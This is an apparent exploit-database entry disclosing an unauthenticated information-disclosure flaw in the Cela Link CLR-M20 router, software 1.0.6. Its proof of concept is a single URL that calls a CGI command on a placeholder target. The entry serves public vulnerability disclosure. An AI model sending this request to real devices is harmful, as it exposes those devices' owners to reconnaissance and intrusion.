# Exploit Title: Cela Link CLR-M20 sw version 1.0.6 - Information Disclosure
# Date: 2018-12-27
# Exploit Author: Mr Winst0n
# Software Link: http://www.celalink.com
# Version: 1.0.6
# Authentication Required: No
# Tested on: Linux
# This vulnerability allows information disclosure by appending
# "/cgi-bin/systemutil.cgi?Command=SystemInfoCmTlsq" to main page
# PoC:
http://target_ip:8081/cgi-bin/systemutil.cgi?Command=SystemInfoCmTlsq